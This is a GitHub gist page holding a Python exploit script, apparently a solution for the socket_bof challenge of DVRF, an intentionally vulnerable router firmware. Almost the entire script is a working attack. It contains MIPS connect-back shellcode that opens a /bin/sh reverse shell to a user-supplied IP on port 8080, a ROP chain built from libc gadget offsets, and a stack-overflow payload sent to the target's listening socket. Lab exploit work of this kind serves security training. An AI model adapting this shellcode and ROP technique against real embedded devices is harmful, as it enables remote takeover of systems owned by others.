Skip to content

Instantly share code, notes, and snippets.

@gitpraetorianlabs

gitpraetorianlabs/exploit-software12.py

Last active June 2, 2016 19:01
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save gitpraetorianlabs/8919397cb43d41fa9679cace80502eaa to your computer and use it in GitHub Desktop.
Save gitpraetorianlabs/8919397cb43d41fa9679cace80502eaa to your computer and use it in GitHub Desktop.
Download ZIP
Raw
exploit-software12.py
import socket, sys , base64, struct, string, time
from getopt import getopt as GetOpt, GetoptError
def usage():
print ""
print "Socket_bof solution for DVRF_v03"
print "By: Elvis Collado [b1ack0wl]"
print ""
print "Usage: %s -s source.ip -d dst.ip -p dst.port" % sys.argv[0]
print ""
print "\t-s Connect back IP"
print "\t-d Destination IP of Socket Listener"
print "\t-p Destination Port that socket_bof is listening on"
print "\t-h Print this Help Menu"
print ""
sys.exit(1)
try:
(opts, args) = GetOpt(sys.argv[1:], 's:d:p:h')
except GetoptError, e:
usage()
for opt, arg in opts:
if opt == "-s":
connectback_ip = arg.split(".")
for a in connectback_ip:
if int(a) == 0:
print "IP cannot have NULL Bytes :("
sys.exit(1)
IP_1= struct.pack("<B",int(connectback_ip[0]))
IP_2= struct.pack("<B",int(connectback_ip[1]))
IP_3= struct.pack("<B",int(connectback_ip[2]))
IP_4= struct.pack("<B",int(connectback_ip[3]))
elif opt == "-d":
host = arg
elif opt == "-p":
port = int(arg)
else:
continue
try:
#create an AF_INET, STREAM socket (TCP)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, msg:
print 'Failed to create socket. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1]
sys.exit();
try:
remote_ip = socket.gethostbyname( host )
except socket.gaierror:
#could not resolve
print 'Hostname could not be resolved. Exiting'
sys.exit()
#Connect to remote server
s.connect((remote_ip , port))
# Shellcode From bowcaster
shellcode = string.join([
"\xfa\xff\x0f\x24", # li t7,-6
"\x27\x78\xe0\x01", # nor t7,t7,zero
"\xfd\xff\xe4\x21", # addi a0,t7,-3
"\xfd\xff\xe5\x21", # addi a1,t7,-3
"\xff\xff\x06\x28", # slti a2,zero,-1
"\x57\x10\x02\x24", # li v0,4183
"\x0c\x01\x01\x01", # syscall 0x40404
"\xff\xff\xa2\xaf", # sw v0,-1(sp)
"\xff\xff\xa4\x8f", # lw a0,-1(sp)
"\xfd\xff\x0f\x3c", # lui t7,0xfffd
"\x27\x78\xe0\x01", # nor t7,t7,zero
"\xe0\xff\xaf\xaf", # sw t7,-32(sp)
# Connect back port 8080
"\x1f\x90\x0e\x3c", # lui t6,0x901f
"\x1f\x90\xce\x35", # ori t6,t6,0x901f
"\xe4\xff\xae\xaf", # sw t6,-28(sp)
# IP Address
IP_3+IP_4+"\x0e\x3c", # lui t6,<ip>
IP_1+IP_2+"\xce\x35", # ori t6,t6,<ip>
"\xe6\xff\xae\xaf", # sw t6,-26(sp)
"\xe2\xff\xa5\x27", # addiu a1,sp,-30
"\xef\xff\x0c\x24", # li t4,-17
"\x27\x30\x80\x01", # nor a2,t4,zero
"\x4a\x10\x02\x24", # li v0,4170
"\x0c\x01\x01\x01", # syscall 0x40404
"\xfd\xff\x0f\x24", # li t7,-3
"\x27\x78\xe0\x01", # nor t7,t7,zero
"\xff\xff\xa4\x8f", # lw a0,-1(sp)
"\x21\x28\xe0\x01", # move a1,t7
"\xdf\x0f\x02\x24", # li v0,4063
"\x0c\x01\x01\x01", # syscall 0x40404
"\xff\xff\x10\x24", # li s0,-1
"\xff\xff\xef\x21", # addi t7,t7,-1
"\xfa\xff\xf0\x15", # bne t7,s0,68 <dup2_loop>
"\xff\xff\x06\x28", # slti a2,zero,-1
"\x62\x69\x0f\x3c", # lui t7,0x6962
"\x2f\x2f\xef\x35", # ori t7,t7,0x2f2f
"\xec\xff\xaf\xaf", # sw t7,-20(sp)
"\x73\x68\x0e\x3c", # lui t6,0x6873
"\x6e\x2f\xce\x35", # ori t6,t6,0x2f6e
"\xf0\xff\xae\xaf", # sw t6,-16(sp)
"\xf4\xff\xa0\xaf", # sw zero,-12(sp)
"\xec\xff\xa4\x27", # addiu a0,sp,-20
"\xf8\xff\xa4\xaf", # sw a0,-8(sp)
"\xfc\xff\xa0\xaf", # sw zero,-4(sp)
"\xf8\xff\xa5\x27", # addiu a1,sp,-8
"\xab\x0f\x02\x24", # li v0,4011
"\x0c\x01\x01\x01" # syscall 0x40404
], '')
# sleep = 0x767142b0 qemu
# sleep = 0x2ab6d2b0 device
# libraries and offsets
libc = 0x2ab3e000 #0x766e5000 #0x2ab3e000 #
sleep_offset = 0x0002f2b0
rop1_offset = 0x000377cc # to get s1 and s0
rop2_offset = 0x000189ec # move t9, s0 jalr t9, nop
rop3_offset = 0x00033d8c # sp into a1
rop4_offset = 0x0001fbcc # a1 into t9 then jump to t9
# Craft Exploit
message = "A" * 51 # Padding
message += struct.pack("<L", libc+rop1_offset) # RA rop1
message += "B" * 40 # padding for lw offset
#Gadget 2 - sleep
message += struct.pack("<L", libc+sleep_offset) #s0 0x28
message += "MMMM" #s1 0x2c
message += struct.pack("<L", libc+rop2_offset) #ra 0x30
# Gadget 3
message += "C" * 60
message += "0" * 4 # s0
message += "1" * 4 # s1
message += "2" * 4 # s2
message += "3" * 4 # s3
message += "4" * 4 # s4
message += struct.pack("<L", libc+rop3_offset) # RA
# Gadget 4
message += "D" * (72-48)
# XOR s0, s0
message += struct.pack("<L",0x02108026) #xor s0 s0
message += struct.pack("<L",0x02b5a826)
message += struct.pack("<L",0x02b5a826)
message += struct.pack("<L", 0xafb0fff8) # sw s0, -8(sp)
#One more Sleep for 5 seconds
# nop to shellcode
message += struct.pack("<L",0x02b5a826) * 8 # xor s5,s5
message += struct.pack("<L", libc+rop4_offset) # RA then null
message += struct.pack("<L", 0xafa0fffc) # sw s0, -4(sp)
message += shellcode
'''
# a0 for sleep is 5 - first gadget
Gadget 1
0x000377cc 3000bf8f lw ra, 0x30(sp)
0x000377d0 2c00b18f lw s1, 0x2c(sp)
0x000377d4 2800b08f lw s0, 0x28(sp)
0x000377d8 0800e003 jr ra
Gadget 2
0x000189ec 21c80002 move t9, s0
0x000189f0 09f82003 jalr t9
0x000189f4 01000524 addiu a1, zero, 1
0x000189f8 02000010 b 0x18a04
Gadget 3
0x00033d8c 1800a527 addiu a1, sp, 0x18
0x00033d90 1000bc8f lw gp, 0x10(sp)
0x00033d94 4800bf8f lw ra, 0x48(sp)
0x00033d98 0800e003 jr ra
Gadget 4
0x0001fbcc 21c8a000 move t9, a1
0x0001fbd0 38008424 addiu a0, a0, 0x38
0x0001fbd4 08002003 jr t9
'''
try :
#Set the whole string
s.sendall(message)
except socket.error:
#Send failed
print 'Send failed'
sys.exit()
print 'Exploit Sent - Check your netcat listener in about 5 seconds.'
s.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment